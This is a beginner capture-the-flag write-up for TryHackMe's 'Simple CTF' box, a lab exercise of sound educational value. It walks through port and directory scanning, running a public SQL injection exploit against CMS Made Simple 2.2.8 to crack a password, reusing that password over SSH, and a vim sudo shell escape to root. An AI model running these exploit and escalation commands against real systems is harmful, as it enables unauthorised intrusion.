The Simple CTF — TryHackMe Writeup

Hello guys! Today we will be looking at ‘The Simple CTF’. It is a beginner level CTF in TryHackMe. TryHackMe has always been the best platform for playing CTF. “Simple CTF” will give a lot of information about various vulnerabilities. So without wasting time, Let’s begin :)

After connecting to the box, we can enumerate the network using nmap.

nmap -A -sS <IP_ADDRESS>

nmap scan results

We can notice 3 open ports after scanning for the top 1000 ports. The FTP server is running at port 21, a web server on port 80 and SSH on port 2222.

We notice the default web server runs on Apache2.

Apache2 Default Page

Before searching for exploits, we can search the server for common web directories using the gobuster tool.

gobuster -u <URL> -w /usr/share/wordlists/dirb/common.txt

gobuster results

We visit the “robots.txt” file, but we do not find anything interesting.

Now, we open the “/simple” page.

CMS Made Simple Homepage

We can find from the page that the webserver has CMS Made Simple v2.2.8 installed.

CMS Made Simple version 2.2.8

On the same page, we can find the link for the page admin login form.

CMS Made Simple Admin Panel

With the information we gathered , we can go to the exciting part, exploitation!

Using searchsploit, we can try to find the appropriate exploit

Searchsploit results

From the results above, we can find that ‘CMS Made Simple < 2.2.10 — SQL Injection’ looks good. This is backed up by a simple google search as well.

Now, we get more information about the exploit using

searchsploit -p 46635

More details on the exploit

But, when I tried to execute the program, I got an error that termcolor wasn’t present. This can be fixed by executing the following command.

We can run the exploit using

python2 /usr/share/exploitdb/exploits/php/webapps/46635.py -u http://<ip>/simple/ — crack -w /usr/share/wordlists/passwords/rockyou.txt

Exploitation Success!

Trying to login with the credentials, we can successfully authenticate in to page!

CMS Admin Panel authenticated

I couldn’t find anything interesting here. So I try to access the SSH service, with

ssh mitch@<IP_ADDRESS>

Using the same credentials, I can successfully login!

SSH successfully authenticated

In the home directory, we can find the user flag!

User Flag

To find other users, I used

ls /home

Users in the machine

There is a second user called sunbath. But I couldn’t access the directory. To escalate our privileges, I tried to find files with root access for user ‘mitch’

We can execute vim with root permission.

To find different ways of Privilege Escalation, we can use this handy dandy website:

https://gtfobins.github.io/gtfobins/vim/

We can use this command for vim:

sudo vim -c ‘:!/bin/sh’

And, voila! We have root access.

Mission Accomplished: Root access

Now, to find the root flag, we can access the /root directory.

Root flag located

Thanks for the read! :)